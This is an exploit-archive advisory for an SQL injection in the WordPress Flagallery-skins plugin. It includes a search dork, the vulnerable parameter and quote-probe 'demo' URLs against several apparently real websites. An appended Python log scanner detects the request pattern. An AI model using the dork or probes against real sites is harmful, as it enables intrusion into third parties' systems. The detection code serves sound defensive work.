The WordPress Flagallery-skins plugin suffers from a SQL injection vulnerability. Note that this advisory has site-specific information.
##############
# Exploit Title : WordPress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
# Location : site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
# Demo :
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
# http://www.unclebobsrockshop.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=songs%27
#
# http://headingtoawedding.ca/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=homepage%27
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
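
A log check for the request pattern in this advisory, added here as an example and not part of the original advisory: it scans web access logs for requests to the plugin's gallery.php whose playlist value, after percent-decoding, is not a plain slug. The slug allowlist, the combined log format and the sample log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter taken from the advisory.
VULN_PATH = "/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php"
PARAM = "playlist"
# Assumption: legitimate playlist names are simple slugs such as "my-playlist".
SLUG = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Client, request target and status from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2527 -> %27 -> ')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client, status, decoded value) for non-slug playlist values."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(VULN_PATH):
            continue
        # parse_qs decodes once; fully_decode catches double encoding.
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            if not SLUG.fullmatch(value):
                hits.append((client, int(status), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
STAMP = "- - [01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 {STAMP} "GET {VULN_PATH}?playlist=my-playlist HTTP/1.1" 200 512',
    f'198.51.100.7 {STAMP} "GET {VULN_PATH}?playlist=recordings%27 HTTP/1.1" 500 0',
    f'198.51.100.7 {STAMP} "GET {VULN_PATH}?playlist=songs%2527 HTTP/1.1" 200 512',
    f'203.0.113.5 {STAMP} "GET /index.php?playlist=x%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same allowlist can be enforced in front of the plugin (for example as a WAF or rewrite rule on the playlist parameter) until the plugin is removed or patched.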